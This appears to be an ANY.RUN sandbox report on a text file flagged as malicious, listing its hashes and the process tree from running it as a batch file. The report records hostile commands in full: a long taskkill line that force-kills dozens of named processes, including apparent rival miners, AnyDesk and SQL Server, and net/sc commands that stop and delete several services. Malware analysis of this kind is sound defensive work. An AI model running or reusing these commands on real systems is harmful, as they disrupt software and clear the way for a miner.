download: | wmi.txt |
Full analysis: | https://app.any.run/tasks/d68a8064-3e4f-4fca-b6ad-0da1e350ab8d |
Verdict: | Malicious activity |
Analysis date: | August 08, 2020, 08:47:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | F791E65AB7C75B610A1C8AD0D048BCCE |
SHA1: | C6684A2E1FB1220F5E11BF9A6B30687735033CC8 |
SHA256: | 9B541BA126909F6AA13B942E480D93CE4D7A049CFEFC64357437F7C2F963B03A |
SSDEEP: | 192:W03cS3XwZQ5DM58NwY7tM8YEAlEBK5gLk3D:WdHa5iY7tM8a |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2816 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\wmi.txt | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2672 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2228 | cmd /c ""C:\Users\admin\Downloads\123.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3304 | taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im spooly.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe /im lsma.exe /im lsmab.exe /im wtcs.exe /im ASBservice.exe /im vid001.exe /im netsv.exe /im uihost64 /im uihost32.exe /im wina.exe /im microsoft.net.exe /im dmw.exe /im dhcpclient.exe /im ctfnom.exe /im loader.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3844 | net1 stop ASBservice | C:\Windows\system32\net1.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1540 | sc delete ASBservice | C:\Windows\system32\sc.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: A tool to aid in developing services for WindowsNT Exit code: 1060 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1380 | net1 stop msupdate | C:\Windows\system32\net1.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1156 | sc delete msupdate | C:\Windows\system32\sc.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: A tool to aid in developing services for WindowsNT Exit code: 1060 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3788 | net1 stop clr_optimization_v4.0.30328_64 | C:\Windows\system32\net1.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Net Command Exit code: 2 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2976 | sc delete clr_optimization_v4.0.30328_64 | C:\Windows\system32\sc.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: A tool to aid in developing services for WindowsNT Exit code: 1060 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2816 | NOTEPAD.EXE | C:\Users\admin\AppData\Local\Temp\wmi.txt | text | |
MD5:F791E65AB7C75B610A1C8AD0D048BCCE | SHA256:9B541BA126909F6AA13B942E480D93CE4D7A049CFEFC64357437F7C2F963B03A | |||
2816 | NOTEPAD.EXE | C:\Users\admin\Downloads\123.bat | text | |
MD5:F791E65AB7C75B610A1C8AD0D048BCCE | SHA256:9B541BA126909F6AA13B942E480D93CE4D7A049CFEFC64357437F7C2F963B03A |